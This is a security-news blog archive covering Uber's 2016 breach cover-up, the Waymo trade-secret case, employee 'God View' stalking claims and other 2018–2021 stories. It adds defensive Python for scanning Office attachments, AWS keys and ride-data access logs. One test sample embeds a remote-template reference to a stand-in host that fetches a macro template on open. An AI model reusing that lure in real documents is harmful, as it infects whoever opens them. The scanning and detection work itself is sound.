Tag Archives: Uber

Security News for the Week Ending January 22, 2021

Parler Finds A New Home With Russian Hosting Provider in Belize

“Hello world, is this thing on?” With that message Parler’s website is back online. Well, at least a one-page website is back online. The site is being hosted by Russian-owned DDoS-Guard, a company that apparently also hosts ISIS websites. Whether the folks who invaded the Capitol earlier this month are going to be willing to post their content on a Russian-hosted server is not clear. It is unlikely that their hosting provider would respond to a US subpoena, but whether they would steal the posts for their own purposes is a different question. Credit: Cybernews

Capitol Terrorist Who (Allegedly) Planned to Sell Pelosi’s Laptop to Russian Intelligence Arrested

The amazing amount of video footage from the storming of the Capitol is really making the cops’ lives a lot easier. Riley June Williams, 22, from Pennsylvania, was outed by her former boyfriend. She videoed herself committing the felony and then shared that video. She has now been arrested. She has not been charged with espionage, yet. After the events of January 6th, she changed her phone number, deleted her social media accounts and fled. Her public defender wants her released but the feds say that she is a flight risk. Given she disappeared even before she was charged, that doesn’t seem unreasonable. Credit: WaPo

Parler Data Is Available for Download

If you want to be an amateur detective and you have 70 terabytes or so of free disk space on your computer, you too can download the data that was scraped from the site during the last few hours of its existence. It is split into 4 GB chunks and more of it is being uploaded in real time. This will be examined and re-examined for a long time. Details can be found here.

Malwarebytes Joins Club of Those Hacked by SolarWinds Hacking Team

Malwarebytes joins the long and growing list of organizations hit by the SolarWinds attackers. In their case the attackers did not come in through SolarWinds software; Malwarebytes was compromised by other techniques the same group uses. They said the damage was minor and limited to some of their emails. Credit: Cyber News

Trump Pardons Google Engineer Who Stole Self Driving Car Trade Secrets and Took Them to Uber

Anthony Levandowski, the Google engineer who went to work for Uber’s self-driving car division, was pardoned by Trump after being sentenced to 18 months for the theft. I am not sure if the pardon relieves him of the obligation to pay Google the $179 million fine, but it probably does. He took 141,000 files with him and likely advanced Uber’s progress by years. Waymo, Google’s self-driving unit, settled its lawsuit against Uber in 2018 for a stake in Uber reported to be worth about $245 million. Curiously, Google is an investor in Uber, so they probably don’t want to hurt them too much. Credit: Cyber News

Breaches Down; Record Count Up

According to Risk Based Security, the NUMBER of breaches reported fell 48% in 2020 compared to 2019, but the number of records exposed was UP by 141% to an amazing 37 BILLION records. We don’t believe that the number of breaches was actually down; likely it is just that a lot of breaches are not being reported. Part of it may be that with other important events like the election and Covid, the media is not covering breaches. In addition, we are seeing some really large breaches. Hacking group ShinyHunters disclosed 129 million hacked records in just five weeks. Credit: Tech Republic

Security News for the Week Ending August 21, 2020

August 13th, a Day That Will Live in Confusion

August 13th is the day that Part B of Section 889 of the 2019 National Defense Authorization Act went into effect. It bans the use of equipment and services tied to certain Chinese companies that have been deemed security threats by the United States. Companies that have this equipment won’t be able to sell to the federal government without a waiver. Contractors have 24 hours to report if they discover, after August 13th, that they are breaking the law. But contractors are allowed to self-certify. While the ban went into effect on August 13th, the GSA training session for contractors has been delayed until mid-September – because they weren’t ready to coherently explain the rules. Ellen Lord, chief of the Pentagon’s acquisition branch, asks contractors to take notes on how this is screwing up their business so that, maybe, they can get Congress to change the law. By the way, this is not a contract flow-down clause, so primes are responsible for what their subs do, I guess. Sorry, contractors. Credit: Federal Computer Week

Senators Say WikiLeaks Likely Knew It Was Helping Russia

The US Senate Select Committee on Intelligence says, in a report, that Vladimir Putin personally ordered the hacking of the DNC and WikiLeaks likely knew that it was helping Russia. The Senate report says WikiLeaks received internal DNC memos FROM Russian hackers. Senators wrote that Trump’s campaign staff sought advance notice of WikiLeaks releases. Paul Manafort is named as the person who was the link between the campaign and Russia. It seems odd that this Republican controlled committee would release this report days before the Republican National Convention’s nomination of Trump for President. Credit: The Register

Hide Your Breach – Go to Jail

The Feds have charged Uber’s former Chief Security Officer with concealing the 2016 breach from the FTC, which was already investigating Uber’s 2014 breach, and with the payments Uber made to the hackers to keep the 2016 breach quiet. He is being charged with obstruction of justice and misprision of a felony (i.e., concealing knowledge of a felony). He faces up to 8 years in prison if convicted. Credit: DoJ

Ever Wonder What Happens to All That Location Data that Apps Collect?

Well, the answer to that is, it depends. This week we found out one thing that happens to that data. The U.S. Secret Service buys it and uses it instead of having to get a warrant to get that same information from the phone company. Nothing illegal about it. Obviously, the Secret Service is not using it to market any products. Curiously, the company that they bought it from does not advertise that they sell your data to the police. In fact, their agreement, similar to the agreement that the Stingray vendor makes the police sign, says that they are forbidden from mentioning it in legal proceedings at all. When this has been an issue with Stingrays, police have dropped charges rather than break the agreement. Credit: Hackread

Securus Sued For Recording Attorney-Client Jail Calls and Providing to Police

Securus provides pay phone services in prisons at what most people say are exorbitant prices. Sometimes they charge 100 times the going price outside. According to theory (and law), Securus is not supposed to listen to or record phone calls between inmates and their lawyers. The only reason they were caught was that a detective was listening to recordings provided to him by Securus and recognized the attorney’s voice. He then reported Securus to the Attorney General. The attorney who was illegally recorded is now suing Securus. The interesting thing is that Securus just settled a similar case in another state. You would think they would learn. Credit: The Register

Security News for the Week Ending September 28, 2018

Cisco Will Eliminate Hard Coded Passwords One Per Month

It seems like every patch cycle, Cisco admits to another product that has an undocumented hard-coded password. I have lost track of how many of them they have removed so far, but the number is scary large.

What is scarier is that I bet Cisco is far from unique; they are just being more honest about it. Are all the other hardware vendors pure as the driven snow? NOT LIKELY!

In this case, very embarrassingly, the hard-coded password was in Cisco’s Video Surveillance Manager. In other words, the bad guys could secretly watch the watchers.

Cisco CLAIMS this was because they forgot to disable this hard-coded account (maybe used for testing) before the production code was released.

Recently Cisco has removed hard-coded credentials from their Linux-based OS, IOS XE, from their Digital Network Architecture (DNA) Center server and from their Prime Collaboration Provisioning server. That is just recently.

This bug rated a 9.8 out of 10 on the severity Richter scale (CVSS v3). Source: ZDNet.

Gig Workers Targeted by Malicious Attackers

This one is classically simple.

Gig workers, who have no IT department, are responding to gig requests on sites like Fiverr and Freelancer.

Unfortunately, those requests have infected documents attached to them. When the gig worker opens the file to decide whether he or she wants to bid on the gig, his or her computer is infected. MAYBE the gig worker’s antivirus software will catch it, but if the files are crafted just slightly differently for each attack, signature-based AV will be blind to them.

Freaking genius.  As long as it doesn’t happen to you.  Source: ZDNet.
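The post does not say what kind of documents were used, so the following is an added example, not code from the post or from the researchers it cites. It assumes the attachments are Office Open XML files (.docx/.docm/.xlsx) and shows the triage a gig worker, or a tool on their behalf, can run before opening a file: look inside the zip package for a VBA project, for embedded OLE objects, and for relationships that load content from a remote location when the document opens (the template-injection trick that carries no macro in the file itself and so sails past hash- and macro-based checks). The sample documents are constructed in memory; the IP address and file names in them are invented.

```python
"""
Pre-open triage of an OOXML document (.docx/.docm/.xlsx/...).
Added example, not from the original post. Assumes the poisoned job
attachments are OOXML packages and checks three delivery mechanisms:
  1. a VBA project (vbaProject.bin) anywhere in the package,
  2. embedded OLE objects (word/embeddings/, xl/embeddings/, ...),
  3. relationships with TargetMode="External" whose type makes Office
     fetch the target at open time (template injection, linked OLE, frames).
"""
import io
import re
import zipfile

# Relationship types that are resolved when the document is opened. A plain
# hyperlink is also "External" but only fires on click, so it is not listed.
REMOTE_LOAD_REL_TYPES = (
    "relationships/attachedTemplate",   # remote template (.dotm) injection
    "relationships/oleObject",          # linked OLE object
    "relationships/frame",              # frame pulling a remote document
    "relationships/externalLinkPath",   # Excel external workbook link
)

def inspect_office_doc(data: bytes) -> dict:
    """Return the risk indicators found in an OOXML package given as bytes."""
    findings = {"vba_project": [], "embedded_ole": [], "remote_rels": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                findings["vba_project"].append(name)
            elif "/embeddings/" in lower:
                findings["embedded_ole"].append(name)
            elif lower.endswith(".rels"):
                xml = zf.read(name).decode("utf-8", errors="replace")
                for rel in re.finditer(r"<Relationship\b[^>]*/?>", xml):
                    tag = rel.group(0)
                    if 'TargetMode="External"' not in tag:
                        continue
                    rtype = re.search(r'Type="([^"]+)"', tag)
                    target = re.search(r'Target="([^"]+)"', tag)
                    if rtype and rtype.group(1).endswith(REMOTE_LOAD_REL_TYPES):
                        findings["remote_rels"].append(
                            (name, target.group(1) if target else ""))
    return findings

def is_risky(data: bytes) -> bool:
    """True if any indicator fired; open such a file in a sandbox, not on the work machine."""
    return any(inspect_office_doc(data).values())

def build_sample(parts: dict) -> bytes:
    """Construct a minimal OOXML-shaped zip from {part name: content} (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed samples: a benign brief with an ordinary hyperlink, a macro
# document, and a macro-free document that pulls a remote template on open.
CLEAN_DOC = build_sample({
    "word/document.xml": "<w:document/>",
    "word/_rels/document.xml.rels":
        '<Relationships><Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://example.invalid/brief" TargetMode="External"/></Relationships>',
})
MACRO_DOC = build_sample({
    "word/document.xml": "<w:document/>",
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 stub",
})
TEMPLATE_INJECTION_DOC = build_sample({
    "word/document.xml": "<w:document/>",
    "word/settings.xml": "<w:settings/>",
    "word/_rels/settings.xml.rels":
        '<Relationships><Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        'Target="http://198.51.100.7/brief.dotm" TargetMode="External"/></Relationships>',
})

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOC), ("macro", MACRO_DOC),
                       ("template", TEMPLATE_INJECTION_DOC)):
        print(label, is_risky(doc), inspect_office_doc(doc))
```

The check is deliberately structural rather than signature-based: re-crafting the lure for each victim changes the hash but not the fact that the package carries a VBA project or an external, load-on-open relationship.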

Your Tax Dollars At Work

Like many public sector (not all!) networks, the security of the Pennsylvania Democratic Caucus was, apparently, not so great.  Equally unsurprisingly, their computers became infected with ransomware.

So they had two choices.  Pay the bad guys $30,000.

OR

Pay Microsoft $703,000 plus.

Of course, since this isn’t coming out of their pockets, they opted for the gold plated, diamond encrusted deal from Microsoft.

Surely, some local outfit would have rebuilt their servers for less than three quarters of a million dollars.

According to Homeland Security, over 4,000 ransomware attacks happen every day.  I have NO way to validate that claim, but I am sure the number is big.  Source : The Trib.

Uber Agrees to Pay $148 Million for Breach – Instead of $2 Billion under CCPA

Uber agreed to pay $148 million to settle claims that it covered up a breach in 2016 by PAYING OFF the hackers to keep quiet and supposedly delete the data.

Lets compare that to what they might have paid under CCPA, the new California law.

57 million records – say 5% in California = 2,850,000 records.

Private right of action: up to $750 per consumer per incident without showing damage. Let’s reduce that to $500 x 2.85 million = $1.425 billion.

AG right to sue for intentional non-compliance: $7,500 per intentional violation (three times the $2,500 base, which a willful cover-up would invite) x 2.85 million = $21.375 billion.

WORST CASE = a little over $22 BILLION.

BEST CASE (maybe) = 10% of that, around $2 billion.

They got off light.

By the way, THIS is why companies are scared of the new law.

Source: Mitch

Newest iPhone, Newest iOS – Hacked in a Week

We tend to think of iPhones as secure.  Secure is a relative term and relatively, the iPhone is secure.

iOS 12 was released on September 17th, along with the new iPhones, the XS and the XS Max.

Today is the 28th and news articles abound that the pair (new phone plus new software) has been hacked.

To be fair, the Pangu team, the group that announced the hack, said that they had hacked the beta back in June.

So, as long as you don’t think secure means secure, the iPhone is secure.

Less insecure might be a better term. Source: Redmondpie.

Uber Naughty Tricks Hide Evidence of Theft

First a disclaimer:  I am not a lawyer and don’t pretend to be one on the Internet – at least most of the time.

The Uber Waymo trade secret theft trial is being delayed once again.

Why?  Because the Department of Justice showed the Judge a 37 page letter from the lawyer of a former Uber employee that Uber had not shared with Waymo.  The judge now wants the former employee to appear in court.

The judge is “unhappy” with Uber because he asked them to produce all relevant documents months ago and this document was not among those produced.  The judge said that he can’t trust anything that they say because they have been proven wrong so many times before.  That is probably not the best way to get on the good side of the judge.

The ex-employee was fired from his job at Uber in April but still works for them as a consultant.  They paid him $2+ million plus another million at the end of his consulting contract plus $1 million plus in Uber stock.

The ex-employee said that Uber has a unit within the company called Marketplace Analytics whose job is to obtain competitive intel, “acquire” trade secrets and gather competitors’ code bases. Your basic dirty-tricks organization whose job it is to break the law and steal confidential information from competitors.

OK, maybe I am being a bit harsh on them, but the methods and techniques really determine whether they broke any laws or not and that is still to be seen.

The ex-employee said that the employees of this group were trained in impeding, obstructing or influencing any lawsuit against Uber.  This includes working very hard to make sure that there was no paper trail of what they were doing.

The employees used self-destructing messaging services like Wickr, computers that could not be traced back to Uber and servers kept separate from the rest of the company. They even made up reasons – apparently not legally valid ones – to claim attorney-client privilege. They also engaged 10 outside security firms.

Waymo is suing Uber for almost $2 billion for theft of trade secrets.

Uber of course, said this is all made up.

There is one thing that is crystal clear as I play a lawyer on the Internet (no, this is not legal advice). *IF*, and that is a big if, Uber hid information that it should have disclosed to the other side, that qualifies as a big no-no and could cause Uber all kinds of problems, all the way up to the judge entering a verdict in Waymo’s favor. That level of pain is VERY unusual, but the judge could fine the company, hold it in contempt or instruct the jury to interpret certain facts in a way that is very unfavorable to Uber because of this.

Right now, he has delayed the trial while Waymo’s attorneys review the letter and decide what to do.

As far as how this affects you and me: if you believe that you MAY be sued, you have “a duty to preserve” evidence that may be relevant to the future case. Not preserving the evidence could cause you to lose the case.

OK, that seems pretty straightforward.

Well, maybe. What if your employees, on their own, decided to use Telegram or Wickr, or decided to use other non-company systems to process or store data – all of which could fall under your duty to preserve? And what if they did this without telling senior management?

The company could be in a world of hurt legally.

What this means is that you as an employer need to understand what tools your employees may be using, even unofficially or unsanctioned, and work with your corporate attorneys to figure out whether that is a problem.

For certain industries, you have a duty to preserve even if there is no lawsuit anticipated, so for those companies, without regard to any potential lawsuit, using these tools can get them in trouble.

Something else for you to deal with.  Sorry.

Information for this post came from Reuters.

Uber Paid Hacker $100k Hush Money; Didn’t Disclose Breach

This may turn out to be a lesson in Internet law for everyone.

In October 2016, hackers breached Uber’s systems and made off with personal information for 57 million riders and drivers. That total includes about 7 million drivers, roughly 600,000 of whom also had their driver’s license numbers taken.

Uber says that no Social Security numbers, credit card numbers or trip information was taken.

At the time, Uber was fighting with U.S. regulators regarding privacy violations.  Someone inside the organization decided that, given what was going on, maybe burying this breach might be a better idea than fessing up.

So Uber paid the hackers $100,000 to “delete” the data.  I am sure that they did that because they are people of honor.  Then they buried the incident.

Fast forward a year and Uber has a new CEO after a whole bunch of bad press.  The CEO hires an outside law firm to help clean up the old west and what do they discover but an old breach, a $100,000 ransom and an oopsie, we forgot to report this.

Paying the ransom is probably not illegal.

Not telling shareholders that they were breached, well that is less clear.  I guess they could say that a breach of 57 million customers is not material.  Unless, that is, word about it gets out and they get sued – which is exactly what is happening now.

Not telling regulators about that – pretty clear that is illegal.

And, given that Uber operates in most states in the U.S. and there are different privacy laws in each of the states, they likely broke the law in a whole bunch of states.

IF, and this is not clear, there was information on residents of foreign countries, they likely broke foreign laws as well.

Here is the lesson in Internet law.

Since the breach was disclosed, the New York AG has said he is investigating and a lawsuit has been filed seeking class action status.

Uber’s co-founder learned of the breach in November 2016, right after Uber had settled a privacy lawsuit with the New York AG and was negotiating with the FTC over the handling of consumer data.  Apparently he decided not to tell the AG or the FTC.

The hack was pretty simple. The hackers got into a private GitHub repository used by Uber engineers, which apparently was not adequately (or at all) protected, and found Amazon Web Services credentials in it. They used those credentials to log in to AWS, found the data and attempted to extort Uber.
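The lesson of that paragraph is that a private repository is not a secret store: anything key-shaped that was ever committed is there for whoever gets read access, including in old commits after the credential has been “removed”. The following is an added example, not Uber’s or GitHub’s tooling, of the scan a practitioner runs over repository content before (or after) the fact. It assumes the leaked material looked like an ordinary config file committed to the repo; the commit IDs, file paths and credential values are constructed (the key values are the placeholder ones AWS uses in its own documentation, not live credentials).

```python
"""
Secret scan for AWS credentials in repository content. Added example; not
code from the post or from Uber. Scans every blob it is given, including
blobs from earlier commits, because deleting a key in a later commit does
not remove it from history. All inputs below are constructed.
"""
import math
import re
from dataclasses import dataclass

# Access key IDs have a fixed shape: AKIA (long-term) or ASIA (temporary)
# followed by 16 uppercase alphanumerics, not embedded in a longer token.
ACCESS_KEY_RE = re.compile(r"(?<![A-Za-z0-9])((?:AKIA|ASIA)[A-Z0-9]{16})(?![A-Za-z0-9])")

# Secret keys are 40 base64-ish characters; anchor on a nearby "secret key"
# label so random 40-character strings elsewhere do not fire.
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws)?[_\- ]?secret[_\- ]?(?:access[_\- ]?)?key"
    r"[^\n]{0,10}?['\"=:\s]+([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)

def shannon_entropy(s: str) -> float:
    """Bits per character; real keys land well above 3.5, placeholders far below."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

@dataclass(frozen=True)
class Finding:
    blob: str
    line: int
    kind: str
    token: str

def scan_blob(name: str, text: str, min_entropy: float = 3.5) -> list:
    """Scan one file version; the entropy gate drops obvious placeholders."""
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in ACCESS_KEY_RE.finditer(line):
            found.append(Finding(name, lineno, "aws_access_key_id", m.group(1)))
        for m in SECRET_KEY_RE.finditer(line):
            token = m.group(1)
            if shannon_entropy(token) >= min_entropy:
                found.append(Finding(name, lineno, "aws_secret_access_key", token))
    return found

def scan_history(commits: dict) -> list:
    """commits maps 'commit:path' -> blob text. Every version is scanned,
    so a key removed in a later commit still shows up from the earlier one."""
    out = []
    for name, text in commits.items():
        out.extend(scan_blob(name, text))
    return out

# Constructed history: creds committed, then "removed" in a follow-up commit.
SAMPLE_COMMITS = {
    "a1f3c9:deploy/settings.py": (
        "# constructed sample, not real credentials\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"
        "BUCKET = 'rider-exports'\n"
    ),
    "b7e210:deploy/settings.py": (
        "# same file after the 'remove creds' commit; history still has them\n"
        "import os\n"
        "AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n"
        "AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n"
        "BUCKET = 'rider-exports'\n"
    ),
    "b7e210:README.md": (
        "Set aws_secret_access_key = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx in .env\n"
    ),
}

if __name__ == "__main__":
    for f in scan_history(SAMPLE_COMMITS):
        print(f"{f.blob}:{f.line}: {f.kind} {f.token[:4]}...")
```

Run against the sample history, the scanner reports both credentials from the first commit and nothing from the second, which is exactly the point: the later commit that reads the keys from the environment is the right fix for the code, but the old blob still has to be treated as leaked and the key rotated. Wiring `scan_blob` into a pre-commit hook stops the first commit from happening at all.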

Uber does not have a reputation as a model citizen; in fact they have been involved in at least five criminal probes over bribes, illegal software, questionable pricing schemes and other issues.  This fits right in there.

Uber has brought in some high-priced talent to help sort out the mess and rehabilitate their image. The former GC of the NSA (not sure they should be a role model for Uber), for example. Based on some questionable NSA activities in the past, he may fit right into Uber’s culture.

What we don’t know at this point is what the various state regulators are going to do about this.  I assume that regulators COULD revoke Uber’s license to operate in their state, but I doubt that will happen.

Could the various states file criminal and/or civil charges – that I suspect is much more likely, especially since they knowingly covered up the breach?

I am sure that it will be at least a few months before we have any idea on the scope of the fallout.  Given Uber’s past and very rocky relationship with regulators, those same regulators may decide that it is payback time.

Information for this post came from Bloomberg.

Uber Spies on Customers, Including Celebs

One thing about data rich environments – you have to trust that the data keepers do what they say they are going to do.

As we all know, Uber collects a lot of data – even data that they don’t know what they will use it for – but surely they will need it in the future – for something.

Uber has said that it can’t access ride information for users, but a former Uber security expert says that is not the case.  He says that Uber employees stalked ex boyfriends and girlfriends and celebrities.

That expert, Ward Spangenberg, who is now suing Uber for age discrimination, says that employees could track politicians, exes, celebrities and personal acquaintances of Uber employees.

A couple of years ago, the concept of “God View” became public – a feature in the Uber software that allowed employees to bypass privacy and security controls.

According to Spangenberg, even drivers’ Social Security numbers are at risk.

The only data, he says, that is not at risk is credit card information, and that is not because Uber protects it but because a third party (Braintree) processes its credit card transactions.

Spangenberg objected, he says, to reckless and illegal practices and Uber fired him.

Another ex-Uber employee, Michael Sierchio, a former senior security engineer, said that when he was at Uber you could stalk an ex or look up anyone’s ride with the flimsiest of excuses. There was no approval required. He said that Uber was interested in growth at all costs and that he was told they were not a security company.

Uber said that it fired fewer than 10 employees who abused the feature.  Of course, if you don’t look, you won’t find any problems, so that number is meaningless.  They claim to have hundreds of security and privacy experts working around the clock.

According to security experts, Uber’s policy is based on the honor system, which employees can abuse at any time.

While Uber has instituted some controls, Spangenberg says that if you know what you are doing you can get around them forever.
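What the two ex-employees describe is the absence of a gate in front of the ride data: no role check, no ticket, no approval, and a policy that is only as good as each employee’s honesty. The following is an added example, not Uber’s code, of what replacing the honor system looks like in practice. The roles, ticket format, thresholds and the whole scenario are assumptions. The gate denies any lookup that lacks a case ticket matching the caller’s queue, reserves accounts on a watchlist (the politicians and celebrities the post mentions) for a safety team, and writes an audit record for every call whether allowed or denied; the detector then runs over that audit log and flags the browsing pattern that the “stalk an ex” stories imply.

```python
"""
Access gate and abuse detection for a ride-history lookup. Added example,
not Uber's code. Roles, ticket format and thresholds are assumptions.
The gate replaces an honor-system lookup with a role allow-list, a
mandatory case ticket from the matching queue, a watchlist reserved for
the safety team, and an append-only audit record for every decision.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

ALLOWED_ROLES = {"support", "fraud", "safety"}
TICKET_PREFIX = {"support": "SUP", "fraud": "FRD", "safety": "SAF"}
TICKET_RE = re.compile(r"^(SUP|FRD|SAF)-\d{5,}$")

@dataclass(frozen=True)
class AuditEvent:
    ts: int
    actor: str
    role: str
    rider: str
    ticket: str
    allowed: bool
    reason: str

@dataclass(frozen=True)
class LookupResult:
    allowed: bool
    reason: str
    rides: tuple

class RideLookupGate:
    """Every lookup, allowed or denied, is appended to self.audit."""

    def __init__(self, rides: dict, watchlist: set):
        self._rides = rides          # rider_id -> list of ride records (constructed)
        self._watchlist = watchlist  # accounts that need the safety team
        self.audit = []

    def lookup(self, ts: int, actor: str, role: str, rider: str, ticket: str = "") -> LookupResult:
        reason = "ok"
        if role not in ALLOWED_ROLES:
            reason = "role not permitted"
        elif not TICKET_RE.match(ticket):
            reason = "missing or malformed ticket"
        elif ticket.split("-")[0] != TICKET_PREFIX[role]:
            reason = "ticket queue does not match role"
        elif rider in self._watchlist and role != "safety":
            reason = "watchlisted account requires safety team"
        allowed = reason == "ok"
        self.audit.append(AuditEvent(ts, actor, role, rider, ticket, allowed, reason))
        rides = tuple(self._rides.get(rider, ())) if allowed else ()
        return LookupResult(allowed, reason, rides)

def detect_abuse(events, watchlist=frozenset(), window: int = 86400,
                 max_distinct: int = 5, max_denied: int = 3) -> dict:
    """Flag actors whose audit trail looks like browsing rather than casework."""
    flags = defaultdict(list)
    by_actor = defaultdict(list)
    for e in events:
        by_actor[e.actor].append(e)
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e.ts)
        # sliding window over distinct riders touched, allowed or not
        for i, start in enumerate(evs):
            distinct = {e.rider for e in evs[i:] if e.ts - start.ts <= window}
            if len(distinct) > max_distinct:
                flags[actor].append(f"{len(distinct)} distinct riders within {window}s")
                break
        denied = [e for e in evs if not e.allowed]
        if len(denied) >= max_denied:
            flags[actor].append(f"{len(denied)} denied lookups")
        if any(not e.allowed and e.rider in watchlist for e in evs):
            flags[actor].append("attempted lookup of watchlisted account")
    return dict(flags)

def build_sample_audit() -> list:
    """Constructed scenario: two people doing casework, two people browsing."""
    rides = {f"rider-{n}": [{"from": "A", "to": "B", "ts": 1000 * n}] for n in range(1, 10)}
    gate = RideLookupGate(rides, watchlist={"rider-7"})  # rider-7: a public figure
    gate.lookup(100, "alice", "support", "rider-1", "SUP-10421")
    gate.lookup(200, "alice", "support", "rider-2", "SUP-10422")
    gate.lookup(300, "carol", "safety", "rider-7", "SAF-00077")   # legitimate safety case
    for n in range(1, 8):  # bob pokes at seven accounts with no ticket at all
        gate.lookup(1000 + n, "bob", "support", f"rider-{n}")
    gate.lookup(2000, "dave", "ops", "rider-7", "SUP-99999")       # wrong role, public figure
    return gate.audit

if __name__ == "__main__":
    for actor, why in detect_abuse(build_sample_audit(), watchlist={"rider-7"}).items():
        print(actor, why)
```

Two design points matter more than the thresholds. Denied attempts are logged and fed to the detector, because a denied lookup of a celebrity account is itself the signal; and the audit list is owned by the gate, not by the caller, so the “if you know what you are doing you can get around them” path has to defeat the gate rather than just skip a form.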

Personally, taxis work pretty well for me most of the time.  If you do use Uber, you should probably kill the app or reboot your phone after you get out of the car.

Information for this post came from Fox News.